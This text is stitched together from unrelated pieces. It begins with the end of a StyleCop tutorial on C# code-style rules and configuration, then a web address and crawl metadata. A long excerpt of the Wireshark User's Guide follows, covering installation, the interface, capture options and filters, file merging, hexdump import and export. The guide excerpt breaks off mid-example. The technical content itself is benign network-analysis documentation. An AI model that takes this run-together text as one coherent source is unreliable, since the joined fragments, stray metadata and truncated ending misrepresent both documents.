/ConsoleApp1/Program.cs(1,1): warning SA1633: The file header is missing or not located at the top of the file. /ConsoleApp1/Program.cs(5,11): warning SA1400: Element 'Program' should declare an access modifier /ConsoleApp1/Program.cs(1,1): warning SA1200: Using directive should appear within a namespace declaration /ConsoleApp1/Program.cs(6,6): warning SA1028: Code should not contain trailing whitespace CSC : warning SA0001: XML comment analysis is disabled due to project configuration 5 Warning(s) 0 Error(s) Time Elapsed 00:00:01.35 When the StyleCop NuGet package is installed, the default rules set is applied. Most likely, your team would like to have custom rules set to match code styles and conventions defined in your team or organization. Custom Ruleset As you have noticed, a *.ruleset file is an XML file that could provide the following features: - Enable and disable individual rules - Configure the severity of violations reported by individual rules I recommend downloading the default ruleset and modifying it according to your needs. There is a complete specification of the rules here. To plug in a custom ruleset to your project you should add *.ruleset file to your project and modify the csproj file by adding CodeAnalysisRuleSet tag as follows: <Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> ... <CodeAnalysisRuleSet>settings.ruleset</CodeAnalysisRuleSet> </PropertyGroup> ... </Project> Configuring StyleCop Another way to configure StyleCop is to add stylecop.json file to the project. It gives the following opportunities: - Specify project-specific text, such as the name of the company and the structure to use for copyright headers - Fine-tune the behavior of certain rules For example, to set the value of the number of columns to use for each indentation of code to 4 and use spaces to indent, do the following: { "settings": { "indentation": { "indentationSize": "4", "useTabs": "false" } } } Summary StyleCop analyzes C# source code to enforce a set of style and consistency rules. Use it as a NuGet package which is the best way to work in a team. Use custom *.ruleset and stylecop.json files to tune the StyleCop according to your project needs. Add SMS, calling to apps in your favorite language
https://hackernoon.com/stylecop-for-net-makes-code-better
CC-MAIN-2022-27
refinedweb
686
55.54
Semver4sSemver4s Parse SemVer, NPM-style SemVer ranges, and check whether some version matches some range. FeaturesFeatures Parsers for semver: import semver4s._ for { version <- parseVersion("1.2.3") matcher <- parseMatcher("~1.2") } yield matcher.matches(version) Short unsafe versions are available too, which are convenient for for example sbt files import semver4s.unsafe._ "1.2.3".satisfies(">=1.2 <2") Support for literal versions and matchers with the v and m interpolator, checked at compile-time import semver4s.Literal._ m"~1.2".matches(v"1.2.3") Supports all npm version ranges as matchers Odds and end include getting upper and lower bounds for matchers and incrementing versions
https://index.scala-lang.org/martijnhoekstra/semver4s/semver4s/0.0.1?target=_2.12
CC-MAIN-2022-05
refinedweb
110
52.36
Sequential movie clip delay in AS3 In this quick tip I will show you three ways of sequentially delaying movie clip animation using Actionscript 3. You will need the TweenNano class which can be downloaded from greensock.com. My examples assume you have four movie clips on the stage with the instance names: mc1, mc2, mc3 and mc4. In the first example I have used the Timer Class with a delay of one second a repeat count of four. This will create four, one seconds delays. Everytime the moveCircle function is called, the counter increments and each movie clip moves to 50 pixels in the y axis after an one second delay. import com.greensock.TweenNano; var counter:Number =-1; var mcArray:Array = [mc1, mc2, mc3, mc4]; var myDelay:Timer=new Timer(1000, mcArray.length ); myDelay.addEventListener(TimerEvent.TIMER, moveCircles); myDelay.start(); function moveCircles(event:TimerEvent):void { counter++; TweenNano.to(mcArray[counter], 2,{y:50}); } The second example uses the delay property in the TweenNano class as an alternative to using the Timer class. I have put the TweenNano.to() method inside a For loop which sets a delay for each of the movie clips. import com.greensock.TweenNano; var mcArray:Array = [mc1, mc2, mc3, mc4]; var len:uint = mcArray.length; for(var i:uint = 0; i < len; i++){ TweenNano.to(mcArray[i], 2, {y: 50, delay: i * 2}); } The third example uses the onComplete property in the TweenNano class to call the playNextBall function. The playNextball function increments the counter and calls the startBall function if the current count is less than the number of items in the array. import com.greensock.TweenNano; var mcArray:Array = [mc1, mc2, mc3, mc4]; var counter:uint = 0; function startBall():void{ TweenNano.to(mcArray[counter], 2, {y: 50, onComplete:playNextBall}); } function playNextBall():void{ if(counter != mcArray.length-1){ counter++; startBall(); } } startBall(); The three examples above all delay the movement of the y position. The same code can be used to delay the other properties of the movie clip such as the x, rotation, height etc. I have delayed the alpha property in the example below. import com.greensock.TweenNano; var mcArray:Array = [mc1, mc2, mc3, mc4]; var len:uint = mcArray.length; for(var i:uint = 0; i < len; i++){ mcArray[i].alpha = 0; TweenNano.to(mcArray[i], 2, {alpha: 1, delay: i * 2}); } You can also use the TweenMax's allFrom method to achieve the same effect. Although this method uses slightly more memory. import com.greensock.TweenMax; var mcArray:Array = [mc1, mc2, mc3]; TweenMax.allFrom(mcArray, 0.5, {alpha:0}, 0.5); Related tutorials Time delay in Actionscript 3 Delay function in Actionscript 3 2 comments: Hi. This is a great little tidbit! I was wondering how you managed to create the reset button. I've used your technique in an extended fashion on a grid of 10x10 movie clips (100 movie clips, that is, not 10x10 pixels) and the sequence works well but I can't reset it with the code that I have. @markerlineable, Can you post the reset code you are using?
http://www.ilike2flash.com/2011/07/sequential-movie-clip-delay-in-as3.html
CC-MAIN-2017-04
refinedweb
513
66.23
Hi Guys! Im new to c++ but have made a few programs. I am currently making a memory testing game. it was all working well untill i started using an array to generate random numbers. if the code is too dificult to understand i'll anotate it but other than that can anyone help me? here is the code: it's not finnished yet but im getting these errors:it's not finnished yet but im getting these errors:Code:#include <cstdlib> #include <iostream> #include <dos.h> #include <windows.h> #include <stdlib.h> #include <conio.h> using namespace std; int main() { int numberarray[20]; int numberarrayplace; cout<<"Welcome to Dave's memory lab! \n"; cout<<"Here we will carry out a test: \n"; cout<<"Remember the numbers!"; cout<<"You will be given 20 numbers from 0 to 100 and you have 30 seconds to memorize them \n"; cout<<"Then you will be tested... \n"; Sleep(1000); cout<<"3 \n"; Sleep(1000); cout<<"2 \n"; Sleep(1000); cout<<"1 \n"; Sleep(1000); system("cls"); numberarray = 1; for ( 1 == 1 ) { numberarray[numberarrayplace] = rand(100); cout<< numberarray[numberarrayplace] << " "; } cout<<"Here are your numbers \n"; Sleep(30000); cout<<"Times up! \n"; } C:\Dev-Cpp\Projects\Fun Projects\Memory Chalenge\main.cpp In function `int main()': 29 C:\Dev-Cpp\Projects\Fun Projects\Memory Chalenge\main.cpp incompatible types in assignment of `int' to `int[20]' 30 C:\Dev-Cpp\Projects\Fun Projects\Memory Chalenge\main.cpp expected `;' before ')' token 35 C:\Dev-Cpp\Projects\Fun Projects\Memory Chalenge\main.cpp expected `)' before ';' token C:\Dev-Cpp\Projects\Fun Projects\Memory Chalenge\Makefile.win [Build Error] [main.o] Error 1 i apreciate your help. Gillypie
http://cboard.cprogramming.com/cplusplus-programming/95791-program-not-working.html
CC-MAIN-2016-50
refinedweb
280
51.65
Table of Contents List of Figures List of Tables List of Examples Table of Contents Wireshark is the world’s foremost network protocol analyzer, but the rich feature set can be daunting for the unfamiliar. This document is part of an effort by the Wireshark team to improve Wireshark’s usability. We hope that you find it useful and look forward to your comments. The intended audience of this book is anyone using Wireshark. This book explains all of the basic and some advanced features of Wireshark. As Wireshark has become a very complex program, not every feature) Wireshark users. The authors would like to thank the whole Wireshark team for their assistance. In particular, the authors would like to thank: The authors would also like to thank the following people for their helpful feedback on this document: The authors would like to acknowledge those man page and README authors for the Wireshark project from who sections of this document borrow heavily: mergecapman page Section D.8, “mergecap: Merging multiple capture files into one” is derived. text2pcapman page Section D.9, “text2pcap: Converting ASCII hexdumps to network captures” is derived. This book was originally developed by Richard Sharpe with funds provided from the Wireshark Fund. It was updated by Ed Warnicke and more recently redesigned and updated by Ulf Lamping. It was originally written in DocBook/XML and converted to AsciiDoc by Gerald Combs. The latest copy of this documentation can always be found at. Should you have any feedback about this document, please send it to the authors through wireshark-dev[AT]wireshark.org. The following table shows the typographic conventions that are used in this guide. Bourne shell, normal user. $ # This is a comment $ git config --global log.abbrevcommit true Bourne shell, root user. # # This is a comment # ninja install Command Prompt (cmd.exe). >rem This is a comment >cd C:\Development PowerShell. PS$># This is a comment PS$> choco list -l C Source Code. #include "config.h" /* This method dissects foos */ static int dissect_foo_message(tvbuff_t *tvb, packet_info *pinfo _U_, proto_tree *tree _U_, void *data _U_) { /* TODO: implement your dissecting code */ return tvb_captured_length(tvb); } Table of Contents course). In the past, such tools were either very expensive, proprietary, or both. However, with the advent of Wireshark, that has changed. Wireshark is available for free, is open source, and is one of the best packet analyzers available today. Here are some reasons people use Wireshark: Wireshark can also be helpful in many other situations. The following are some of the many features Wireshark provides: However, to really appreciate its power you have to start using it. Figure 1.1, “Wireshark captures packets and lets you examine their contents.” shows Wireshark having captured some packets and waiting for you to examine them. Wireshark can capture traffic from many different network media types, including Ethernet, Wireless LAN, Bluetooth, USB, and more. The specific media types supported may be limited by several factors, including your hardware and operating system. An overview of the supported media types can be found at. Wireshark can open packet captures from a large number of capture programs. For a list of input formats see Section 5.2.2, “Input File Formats”. Wireshark can save captured packets in many formats, including those used by other capture programs. For a list of output formats see Section 5.3.2, “Output File Formats”. There are protocol dissectors (or decoders, as they are known in other products) for a great many protocols: see Appendix C, Protocols and Protocol Fields. Wireshark is an open source software project, and is released under the GNU General Public License (GPL). You can freely use Wireshark on any number of computers you like, without worrying about license keys or fees or such. In addition, all source code is freely available under the GPL. Because of that, it is very easy for people to add new protocols to Wireshark, either as plugins, or built into the source, and they often do! Here are some things Wireshark does not provide:. If Wireshark runs out of memory it will crash. See for details and workarounds. Although Wireshark uses a separate process to capture packets, the packet analysis is single-threaded and won’t benefit much from multi-core systems. Wireshark should support any version of Windows that is still within its extended support lifetime. At the time of writing this includes Windows 10, 8.1, Server 2019, Server 2016, Server 2012 R2, and Server 2012. It also requires the following: A supported network card for capturing Older versions of Windows which are outside Microsoft’s extended lifecycle support window are no longer supported. It is often difficult or impossible to support these systems due to circumstances beyond our control, such as third party libraries on which we depend or due to necessary features that are only present in newer versions of Windows such as hardened security or memory management. See the Wireshark release lifecycle page for more details. Wireshark supports macOS 10.12 and later. Similar to Windows, supported macOS versions depend on third party libraries and on Apple’s requirements. The system requirements should be comparable to the specifications listed above for Windows. Wireshark runs on most UNIX and UNIX-like platforms including Linux and most BSD variants. The system requirements should be comparable to the specifications listed above for Windows. Binary packages are available for most Unices and Linux distributions including the following platforms: If a binary package is not available for your platform you can download the source and try to build it. Please report your experiences to wireshark-dev[AT]wireshark.org. You can get the latest copy of the program from the Wireshark website at. The download page should automatically highlight the appropriate download for your platform and direct you to the nearest mirror. Official Windows and macOS installers are signed by the Wireshark Foundation. macOS installers are also notarized. A new Wireshark version typically becomes available every six weeks. If you want to be notified about new Wireshark releases you should subscribe to the wireshark-announce mailing list. You will find more details in Section 1.6.5, “Mailing Lists”. Each release includes a list of file hashes which are sent to the wireshark-announce mailing list and placed in a file named SIGNATURES-x.y.z.txt. Announcement messages are archived at and SIGNATURES files can be found at. Both are GPG-signed and include verification instructions for Windows, Linux, and macOS. As noted above, you can also verify downloads on Windows and macOS using the code signature validation features on those systems. In late 1997 Gerald Combs needed a tool for tracking down network problems and wanted to learn more about networking so he started writing Ethereal (the original name of the Wireshark project) as a way to solve both problems. Ethereal was initially released after several pauses in development in July 1998 as version 0.2.0. Within days patches, bug reports, and words of encouragement started arriving and Ethereal was on its way to success. Not long after that Gilbert Ramirez saw its potential and contributed a low-level dissector to it. In October, 1998 Guy Harris the project has become very long since then, and almost all of them started with a protocol that they needed that Wireshark or did not already handle. So they copied an existing dissector and contributed the code back to the team. In 2006 the project moved house and re-emerged under a new name: Wireshark. In 2008, after ten years of development, Wireshark finally arrived at version 1.0. This release was the first deemed complete, with the minimum features implemented. Its release coincided with the first Wireshark Developer and User Conference, called Sharkfest. In 2015 Wireshark 2.0 was released, which featured a new user interface. Wires) version: The Wireshark source code and binary kits for some platforms are all available on the download page of the Wireshark website:. If . Table of Contents As with all things there must be a beginning and so it is with Wireshark. To use Wireshark you must first install it. If you are running Windows or macOS you can download an official release at, install it, and skip the rest of this chapter. If you are running another operating system such as Linux or FreeBSD you might want to install from source. Several Linux distributions offer Wireshark packages but they commonly provide out-of-date versions. No other versions of UNIX ship Wireshark so far. For that reason, you will need to know where to get the latest version of Wireshark and how to install it. This chapter shows you how to obtain source and binary packages and how to build Wireshark from source should you choose to do so. The general steps are the following: You can obtain both source and binary distributions from the Wireshark web site:. Select the download link and then select the desired binary or source package. Windows installer names contain the platform and version. For example, Wireshark-win64-3.5.0.exe installs Wireshark 3 official Wireshark Windows package will check for new versions and notify you when they are available. If you have the Check for updates preference disabled or if you run Wireshark in an isolated environment you should subscribe. We. can do so by opening the Install ChmodBPF.pkg file in the Wireshark .dmg or from Wireshark itself by opening → selecting the “Folders” tab, and double-clicking “macOS Extras”. The installer package includes Wireshark along with ChmodBPF and system path packages. See the included Read me first.html file for more details. Building. In general installing the binary under your version of UNIX will be specific to the installation methods used with your version of UNIX. For example, under AIX, you would use smit to install the Wireshark binary package, while under Tru64 UNIX (formerly Digital UNIX) you would use setld. Building RPMs from Wireshark’s source code results in several packages (most distributions follow the same system): wiresharkpackage contains the core Wireshark libraries and command-line tools. wiresharkor wireshark-qtpackage contains the Qt-based GUI. Many distributions use yum or a similar package management tool to make installation of software (including its dependencies) easier. If your distribution uses yum, use the following command to install Wireshark together with the Qt GUI: yum install wireshark wireshark-qt If you’ve built your own RPMs from the Wireshark sources you can install them by running, for example: rpm -ivh wireshark-2.0.0-1.x86_64.rpm wireshark-qt-2.0.0-1.x86_64.rpm If the above command fails because of missing dependencies, install the dependencies first, and then retry the step above. If you can just install from the repository then use apt install wireshark Apt should take care of all of the dependency issues for you. Use the following command to install Wireshark under Gentoo Linux with all of the extra features: USE="c-ares ipv6 snmp ssl kerberos threads selinux" emerge wireshark A number of errors can occur during the build and installation process. Some hints on solving these are provided here. If the cmake stage fails you will need to find out why. You can check the file CMakeOutput.log and CMakeError.log in the build directory to find out what failed. The last few lines of this file should help in determining the problem. The standard problems are that you do not have a required development package on your system or that the development package isn’t new enough. Note that installing a library package isn’t enough. You need to install its development package as well. cmake will also fail if you do not have libpcap (at least the required include files) on your system. If you cannot determine what the problems are, send an email to the wireshark-dev mailing list explaining your problem. Include the output from cmake and anything else you think is relevant such as a trace of the make stage. Table of Contents By now you have installed Wireshark and are likely keen to get started capturing your first packets. In the next chapters we will explore: You can start Wireshark from your shell or window manager. In the following chapters a lot of screenshots from Wireshark will be shown. As Wireshark runs on many different platforms with many different window managers, different styles applied and there are different versions of the underlying GUI toolkit). Wireshark’s main window consists of parts that are commonly known from many other GUI programs. Packet list and detail navigation can be done entirely from the keyboard. Table 3.1, “Keyboard Navigation” shows a list of keystrokes that will let you quickly move around a capture file. See Table 3.6, “Go menu items” for additional navigation keystrokes. → → will show a list of all shortcuts in the main window. Additionally, typing anywhere in the main window will start filling in a display filter.→ → will show a list of all shortcuts in the main window. Additionally, typing anywhere in the main window will start filling in a display filter. Wireshark’s main menu is located either at the top of the main window (Windows, Linux) or at the top of your main screen (macOS). An example is shown in Figure 3.2, “The Menu”. The main menu contains the following items: Each of these menu items is described in more detail in the sections that follow. The Wireshark file menu contains the fields shown in Table 3.2, “File menu items”. The Wireshark Edit menu contains the fields shown in Table 3.3, “Edit menu items”. The Wireshark View menu contains the fields shown in Table 3.4, “View menu items”. The Wireshark Go menu contains the fields shown in Table 3.6, “Go menu items”. The Wireshark Capture menu contains the fields shown in Table 3.7, “Capture menu items”. The Wireshark Analyze menu contains the fields shown in Table 3.8, “Analyze menu items”. The Wireshark Statistics menu contains the fields shown in Table 3.9, “Statistics menu items”. Each menu item brings up a new window showing specific statistics. The Wireshark Telephony menu contains the fields shown in Table 3.10, “Telephony menu items”. Each menu item shows specific telephony related statistics. The Wireless menu lets you analyze Bluetooth and IEEE 802.11 wireless LAN activity as shown in Figure 3.11, “The “Wireless” Menu”. Each menu item shows specific Bluetooth and IEEE 802.11 statistics. The Wireshark Tools menu contains the fields shown in Table 3.12, “Tools menu items”. The Wireshark Help menu contains the fields shown in Table 3.13, “Help menu items”. The main toolbar provides quick access to frequently used items from the menu. This toolbar cannot be customized by the user, but it can be hidden using the View menu if the space on the screen is needed to show more packet data. Items in the toolbar will be enabled or disabled (greyed out) similar to their corresponding menu items. For example, in the image below shows the main window toolbar after a file has been opened. Various file-related buttons are enabled, but the stop capture button is disabled because a capture is not in progress. The filter toolbar lets you quickly edit and apply display filters. More information on display filters is available in Section 6.3, “Filtering Packets While Viewing”. The”. The. The packet bytes pane shows the data of the current packet (selected in the “Packet List” pane) in a hexdump style. The “Packet Bytes” pane shows a canonical hex dump of the packet data. Each line contains the data offset, sixteen hexadecimal bytes, and sixteen ASCII bytes. Non-printable bytes are replaced with a period (“.”). Depending on the packet data, sometimes more than one page is available, e.g. when Wireshark has reassembled some packets into a single chunk of data. (See Section 7.8, “Packet Reassembly” for details). In this case you can see each data source by clicking its corresponding tab at the bottom of the pane. Additional pages typically contain data reassembled from multiple packets or decrypted data. The context menu (right mouse click) of the tab labels will show a list of all available pages. This can be helpful if the size in the pane is too small for all the tab labels. The statusbar displays informational messages. In general, the left side will show context related information, the middle part will show information about the current capture file, and the right side will show the selected configuration profile. Drag the handles between the text areas to change the size. This statusbar is shown while no capture file is loaded, e.g. when Wireshark is started. shows the current number of packets in the capture file. The following values are displayed: For a detailed description of configuration profiles, see Section 11.6, “Configuration Profiles”. This is displayed if you have selected a protocol field in the “Packet Details” pane. This is displayed if you are trying to use a display filter which may have unexpected results. For a detailed description see Section 6.4.7, “A Common Mistake with !=”. Table of Contents Capturing live network data is one of the major features of Wireshark. The Wireshark capture engine provides the following features: The capture engine still lacks the following features: Setting up Wireshark to capture packets for the first time can be tricky. A comprehensive guide “How To setup a Capture” is available at. Here are some common pitfalls: If you have any problems setting up your capture environment you should have a look at the guide mentioned above. The following methods can be used to start capturing packets with Wireshark: $ wireshark -i eth0 -k This will start Wireshark capturing on interface eth0. More details can be found at Section 11.2, “Start Wireshark from the command line”. When you open Wireshark without starting a capture or opening a capture file it will display the “Welcome Screen,” which lists any recently opened capture files and available capture interfaces. Network activity for each interface will be shown in a sparkline next to the interface name. It is possible to select more than one interface and capture from them simultaneously. Some interfaces allow or require configuration prior to capture. This will be indicated by a configuration icon ( ) to the left of the interface name. Clicking on the icon will show the configuration dialog for that interface. Hovering over an interface will show any associated IPv4 and IPv6 addresses and its capture filter. Wireshark isn’t limited to just network interfaces — on most systems you can also capture USB, Bluetooth, and other types of packets. Note also that an interface might be hidden if it’s inaccessible to Wireshark or if it has been hidden as described in Section 4.6, “The “Manage Interfaces” Dialog Box”. When you select Figure 4.3, “The “Capture Options” input tab”. If you are unsure which options to choose in this dialog box, leaving the defaults settings as they are should work well in many cases.→ (or use the corresponding item in the main toolbar), Wireshark pops up the “Capture Options” dialog box as shown in The “Input” tab contains the the “Interface” table, which shows the following columns: Hovering over an interface or expanding it will show any associated IPv4 and IPv6 addresses. If “Enable promiscuous mode on all interfaces” is enabled, the individual promiscuous mode settings above will be overridden. “Capture filter for selected interfaces” can be used to set a filter for more than one interface at the same time. Figure 4.6, “The “Manage Interfaces” dialog box” where pipes can be defined, local interfaces scanned or hidden, or remote interfaces added.opens the Figure 4.7, “The “Compiled Filter Output” dialog box”, which shows you the compiled bytecode for your capture filter. This can help to better understand the capture filter you created.opens The “Output” tab shows the following information: Sets the conditions for switching a new capture file. A new capture file can be created based on the following conditions: More details about capture files can be found in Section 4.8, “Capture files and file modes”. The “Options” tab shows the following information: See Section 7.9, “Name Resolution” for more details on each of these options. Capturing can be stopped based on the following conditions: You can clickfrom any tab to commence the capture or to apply your changes and close the dialog. The “Manage Interfaces” dialog box initially shows the “Local Interfaces” tab, which lets you manage the following: The “Pipes” tab lets you capture from a named pipe. To successfully add a pipe, its associated named pipe must have already been created. Clickand type the name of the pipe including its path. Alternatively, can be used to locate the pipe. To remove a pipe from the list of interfaces, select it and press. On Microsoft Windows, the “Remote Interfaces” tab lets you capture from an interface on a different machine. The Remote Packet Capture Protocol service must first be running on the target platform before Wireshark can connect to it. The easiest way is to install Npcap from {npcap-download-url} on the target. Once installation is completed go to the Services control panel, find the Remote Packet Capture Protocol service and start it. On Linux or Unix you can capture (and do so more securely) through an SSH tunnel. To add a new remote capture interface, clickand specify the following: Each interface can optionally be hidden. In contrast to the local interfaces they are not saved in the preferences file. To remove a host including all its interfaces from the list, select it and click thebutton. This figure shows the results of compiling the BPF filter for the selected interfaces. In the list on the left the interface names are listed. The results of compiling a filter for the selected interface are shown on the right. While capturing the underlying libpcap capturing engine will grab the packets from the network card and keep the packet data in a (relatively). In most cases you won’t have to modify link-layer header type. Some exceptions are as follows: If you are capturing on an Ethernet device you might be offered a choice of “Ethernet” or “DOCSIS”. If you are capturing traffic from a Cisco Cable Modem Termination System that is putting DOCSIS traffic onto the Ethernet to be captured, select “DOCSIS”, otherwise select “Ethernet”. If you are capturing on an 802.11 device on some versions of BSD you might be offered a choice of “Ethernet” or “802.11”. “Ethernet” will cause the captured packets to have fake (“cooked”) Ethernet headers. “802.11” will cause them to have full IEEE 802.11 headers. Unless the capture needs to be read by an application that doesn’t support 802.11 headers you should select “802.11”. If you are capturing on an Endace DAG card connected to a synchronous serial line you might be offered a choice of “PPP over serial” or “Cisco HDLC”. If the protocol on the serial line is PPP, select “PPP over serial” and if the protocol on the serial line is Cisco HDLC, select “Cisco HDLC”. If you are capturing on an Endace DAG card connected to an ATM network you might be offered a choice of “RFC 1483 IP-over-ATM” or “Sun raw ATM”. If the only traffic being captured is RFC 1483 LLC-encapsulated IP, or if the capture needs to be read by an application that doesn’t support SunATM headers, select “RFC 1483 IP-over-ATM”, otherwise select “Sun raw ATM”. Wireshark supports limiting the packet capture to packets that match a capture filter. Wireshark capture filters are written in libpcap filter language. Below is a brief overview of the libpcap filter language’s syntax. Complete documentation can be found at the pcap-filter man page. You can find many Capture Filter examples at. You enter the capture filter into the “Filter” field of the Wireshark “Capture Options” dialog box, as shown in Figure 4.3, “The “Capture Options” input tab”. A capture filter takes the form of a series of primitive expressions connected by conjunctions (and/or) and optionally preceded by not: [not] primitive [and|or [not] primitive ...] An example is shown in Example 4.1, “A capture filter for telnet that captures traffic to and from a particular host”. Example 4.1. A capture filter for telnet that captures traffic to and from a particular host tcp port 23 and host 10.0.0.5 This example captures telnet traffic to and from the host 10.0.0.5, and shows how to use two primitives and the and conjunction. Another example is shown in Example 4.2, “Capturing all telnet traffic not from 10.0.0.5”, and shows how to capture all telnet traffic except that from 10.0.0.5. This primitive allows you to filter on TCP and UDP port numbers. You can optionally precede this primitive with the keywords src|dst and tcp|udp which allow you to specify that you are only interested in source or destination ports and TCP or UDP packets respectively. The keywords tcp|udp must appear before src|dst. If these are not specified, packets will be selected for both the TCP and UDP protocols and when the specified address appears in either the source or destination port field. If Wireshark is running remotely (using e.g. SSH, an exported X11 window, a terminal server, …), the remote content has to be transported over the network, adding a lot of (usually unimportant) packets to the actually interesting traffic. To avoid this, Wireshark tries to figure out if it’s remotely connected (by looking at some specific environment variables) and automatically creates a capture filter that matches aspects of the connection. The following environment variables are analyzed: SSH_CONNECTION(ssh) SSH_CLIENT(ssh) REMOTEHOST(tcsh, others?) DISPLAY(x11) SESSIONNAME(terminal server) On Windows it asks the operating system if it’s running in a Remote Desktop Services environment. You might see the following dialog box while a capture is running: This dialog box shows a list of protocols and their activity over time. It can be enabled via the “capture.show_info” setting in the “Advanced” preferences. A running capture session will be stopped in one of the following ways: A running capture session can be restarted with the same capture options as the last time, this will remove all packets previously captured. This can be useful, if some uninteresting packets are captured and there’s no need to keep them. Restart is a convenience function and equivalent to a capture stop following by an immediate capture start. A restart can be triggered in one of the following ways: Table of Contents This chapter will describe input and output of capture data. Wireshark can read in previously saved capture files. To read them, simply select the Section 5.2.1, “The “Open Capture File” Dialog Box”.→ menu or toolbar item. Wireshark will then pop up the “File Open” dialog box, which is discussed in more detail in If you haven’t previously saved the current capture file you will be asked to do so to prevent data loss. This warning can be disabled in the preferences. In addition to its native file format (pcapng), Wireshark can read and write capture files from a large number of other packet capture programs as well. See Section 5.2.2, “Input File Formats” for the list of capture formats Wireshark understands. The “Open Capture File” dialog box allows you to search for a capture file containing previously captured packets for display in Wireshark. The following sections show some examples of the Wireshark “Open File” dialog box. The appearance of this dialog depends on the system. However, the functionality should be the same across systems. Common dialog behaviour on all systems: Wireshark adds the following controls: This is the common Windows file open dialog along with some Wireshark extensions. This is the common Qt file open dialog along with some Wireshark extensions. The native capture file formats used by Wireshark are: The following file formats from other capture tools can be opened by Wireshark: New file formats are added from time to time. It may not be possible to read some formats dependent on the packet types captured. Ethernet captures are usually supported for most file formats but it may not be possible to read other packet types such as PPP or IEEE 802.11 from all file formats. You ;-) Sometimes you need to merge several capture files into one. For example, this can be useful if you have captured simultaneously from multiple interfaces at once (e.g. using multiple instances of Wireshark). There are three ways to merge capture files using Wireshark: mergecaptool from the command line to merge capture files. This tool provides the most options to merge capture files. See Section D.8, “mergecap: Merging multiple capture files into one” for details. This lets you select a file to be merged into the currently loaded file. If your current data has not been saved you will be asked to save it first. Most controls of this dialog will work the same way as described in the “Open Capture File” dialog box. See Section 5.2.1, “The “Open Capture File” Dialog Box” for details. Specific controls of this merge dialog are: This is the common Windows file open dialog with additional Wireshark extensions. This is the Qt file open dialog with additional Wireshark extensions. Wireshark can read in a hex dump and write the data described into a temporary libpcap capture file. It can read hex dumps with multiple packets in them, and build a capture file of multiple packets. It is also capable of generating dummy Ethernet, IP and UDP, TCP, or SCTP headers, in order to build fully processable packet dumps from hexdumps of application-level data only. Alternatively a Dummy PDU header can be added to specify a dissector the data should be passed to initially. Two methods for converting the input are supported: Wireshark understands a hexdump of the form generated by od -Ax -tx1 -v. or decimal), of more than two hex digits. Here is a sample dump that can be imported:. Byte and hex numbers can be uppercase or lowercase. Any text before the offset is ignored, including email forwarding characters >. Any lines of text between the bytestring lines. If not the first packet is timestamped with the current time the import takes place. Multiple packets are written with timestamps differing by one nanosecond each. In general, short of these restrictions, Wireshark Wireshark. Currently there are no directives implemented. In the future these may be used to give more fine grained control on the dump and the way it should be processed e.g. timestamps, encapsulation type etc. Wireshark is also capable of scanning the input using a custom perl regular expression as specified by GLib’s GRegex here. Using a regex capturing a single packet in the given file wireshark will search the given file from start to the second to last character (the last character has to be \n and is ignored) for non-overlapping (and non-empty) strings matching the given regex and then identify the fields to import using named capturing subgroups. Using provided format information for each field they are then decoded and translated into a standard libpcap file retaining packet order. Note that each named capturing subgroup has to match exactly once a packet, but they may be present multiple times in the regex. For example the following dump: > 0:00:00.265620 a130368b000000080060 > 0:00:00.280836 a1216c8b00000000000089086b0b82020407 < 0:00:00.295459 a2010800000000000000000800000000 > 0:00:00.296982 a1303c8b00000008007088286b0bc1ffcbf0f9ff > 0:00:00.305644 a121718b0000000000008ba86a0b8008 < 0:00:00.319061 a2010900000000000000001000600000 > 0:00:00.330937 a130428b00000008007589186b0bb9ffd9f0fdfa3eb4295e99f3aaffd2f005 > 0:00:00.356037 a121788b0000000000008a18 could be imported using these settings: regex: ^(?<dir>[<>])\s(?<time>\d+:\d\d:\d\d.\d+)\s(?<data>[0-9a-fA-F]+)$ timestamp: %H:%M:%S.%f dir: in: < out: > encoding: HEX Caution has to be applied when discarding the anchors ^ and $, as the input is searched, not parsed, meaning even most incorrect regexes will produce valid looking results when not anchored (however anchors are not guaranteed to prevent this). It is generally recommended to sanity check any files created using this conversion. Supported fields: data: Actual captured frame data The only mandatory field. This should match the encoded binary data captured and is used as the actual frame data to import. time: timestamp for the packet The captured field will be parsed according to the given timestamp format into a timestamp. If no timestamp is present an arbitrary counter will count up seconds and nanoseconds by one each packet. dir: the direction the packet was sent over the wire The captured field is expected to be one character in length, any remaining characters are ignored (e.g. given "Input" only the 'I' is looked at). This character is compared to lists of characters corresponding to inbound and outbound and the packet is assigned the corresponding direction. If neither list yields a match, the direction is set to unknown. If this field is not specified the entire file has no directional information. seqno: an ID for this packet Each packet can be assigned a arbitrary ID that can used as field by Wireshark. This field is assumed to be a positive integer base 10. This field can e.g. be used to reorder out of order captures after the import. If this field is not given, no IDs will be present in the resulting file. This dialog box lets you select a text file, containing a hex dump of packet data, to be imported and set import parameters. Specific controls of this import dialog are split in three sections: This section is split in the two alternatives for input conversion, accessible in the two Tabs "Hex Dump" and "Regular Expression" In addition to the conversion mode specific inputs, there are also common parameters, currently only the timestamp format. ^and $are set to match directly before and after newlines \nor \r\n. See GRegex for a full documentation. The Encoding used for the binary data. Supported encodings are plain-hexadecimal, -octal, -binary and base64. Plain here means no additional characters are present in the data field beyond whitespaces, which are ignored. Any unexpected characters abort the import process. Ignored whitespaces are \r, \n, \t, \v, ` ` and only for hex :, only for base64 =. Any incomplete bytes at the field’s end are assumed to be padding to fill the last complete byte. These bits should be zero, however this is not checked. (?<dir>…)group. This is the format specifier used to parse the timestamps in the text file to import. It uses the same format as strptime(3) with the addition of %f for zero padded fractions of seconds. The percision of %f is determined from it’s length. The most common fields are %H, %M and %S for hours, minutes and seconds. The straightforward HH:MM:SS format is covered by %T. For a full definition of the syntax look for strptime(3), In Regex mode this field is only available when a (?<time>…) group is present. In Hex Dump mode if there are no timestamps in the text file to import, leave this field empty and timestamps will be generated based on the time of import. Once all input and import parameters are setup clickto start the import. If your current data wasn’t saved before you will be asked to save it first. If the import button doesn’t unlock, make sure all encapsualation parameters are in the expected range and all unlocked fields are populated when using regex mode (the placeholder text is not used as default). When completed there will be a new capture file loaded with the frames imported from the text file. When. Wireshark provides a variety of options for exporting packet data. This section describes general ways to export data from the main Wireshark application. There are many other ways to export or extract data from capture files, including processing tshark output and customizing Wireshark and tshark using Lua scripts. This is similar to the “Save” dialog box, but it lets you save specific packets. This can be useful for trimming irrelevant or unwanted packets from a capture file. See Packet Range for details on the range controls. This lets you save the packet list, packet details, and packet bytes as plain text, CSV, JSON, and other formats. The format can be selected from the “Export As” dropdown and further customized using the “Packet Range” and “Packet Format” controls. Some controls are unavailable for some formats, notably CSV and JSON. The following formats are supported: Here are some examples of exported data: Plain text. No. Time Source Destination Protocol Length SSID Info 1 0.000000 